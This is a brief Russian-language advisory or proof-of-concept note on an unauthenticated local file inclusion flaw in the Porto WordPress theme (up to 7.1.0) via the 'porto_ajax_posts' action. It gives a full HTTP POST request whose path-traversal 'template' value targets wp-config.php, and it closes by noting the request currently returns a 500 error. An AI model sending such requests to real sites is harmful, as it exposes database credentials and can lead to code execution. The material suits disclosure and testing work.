
Porto <= 7.1.0 - Неаутентифицированное локальное включение файлов через porto_ajax_posts
Porto <= 7.1.0 - Неавторизованное локальное включение файлов через porto_ajax_posts
Тема Porto для WordPress уязвима к локальному включению файлов во всех версиях до 7.1.0 включительно через функцию 'porto_ajax_posts'. Это позволяет неавторизованным атакующим включать и выполнять произвольные файлы на сервере, что позволяет выполнять любой PHP-код в этих файлах. Это может быть использовано для обхода контроля доступа, получения конфиденциальных данных или выполнения кода в случаях, когда можно загрузить и включить файл типа PHP.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
На данный момент получаю ошибку 500.